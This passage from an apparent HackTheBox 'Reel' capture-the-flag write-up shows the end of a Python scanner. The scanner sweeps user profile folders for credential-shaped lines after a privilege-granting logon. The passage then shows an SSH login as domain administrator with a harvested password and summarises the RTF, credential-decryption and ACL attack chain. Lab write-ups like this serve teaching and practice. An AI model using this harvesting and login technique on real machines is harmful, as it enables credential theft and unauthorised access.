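def scan_script(text, name="<inline>"):
    """Return one finding per (line, pattern) hit: file, line number, kind and the captured evidence."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS:
            m = rx.search(line)
            if not m:
                continue
            evidence = ":".join(g for g in m.groups() if g) or line.strip()
            findings.append({"file": name, "line": lineno, "kind": kind, "evidence": evidence})
    return findings


def scan_tree(root):
    """Walk a directory such as the profile root and read whatever the current token allows."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            try:
                text = path.read_text(errors="replace")
            except (PermissionError, OSError):
                continue                              # not every profile will be readable
            findings.extend(scan_script(text, str(path)))
    return findings


if __name__ == "__main__":
    for f in scan_script(SAMPLE_SCRIPT, "BackupScript.ps1"):
        print(f"{f['file']}:{f['line']}  {f['kind']:26} {f['evidence']}")
```

Point scan_tree at the top of the profiles directory right after a fresh logon that carries a new group membership, as happened here with Backup_Admins, and it reports every credential-shaped line it can reach together with the file and line number.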
I could use this admin password to log in to the machine as “administrator” via SSH:
$ ssh administrator@10.10.10.77
administrator@10.10.10.77's password:
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
administrator@REEL C:\Users\Administrator>whoami
htb\administrator
administrator@REEL C:\Users\Administrator>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::247
IPv6 Address. . . . . . . . . . . : dead:beef::35be:d552:f422:2ae0
Link-local IPv6 Address . . . . . : fe80::35be:d552:f422:2ae0%12
IPv4 Address. . . . . . . . . . . : 10.10.10.77
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:c0a4%12
10.10.10.2
Tunnel adapter isatap.{D624EF91-4048-48C6-9EA9-5EB2ACE63486}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : htb
administrator@REEL C:\Users\Administrator>
Conclusion
In this engagement, we systematically uncovered vulnerabilities across multiple services, and leveraged each finding to advance our foothold. By combining thorough enumeration with targeted exploitation (crafting a malicious RTF, decrypting credentials, and performing ACL enumeration), we escalated privileges from a standard user to domain administrator.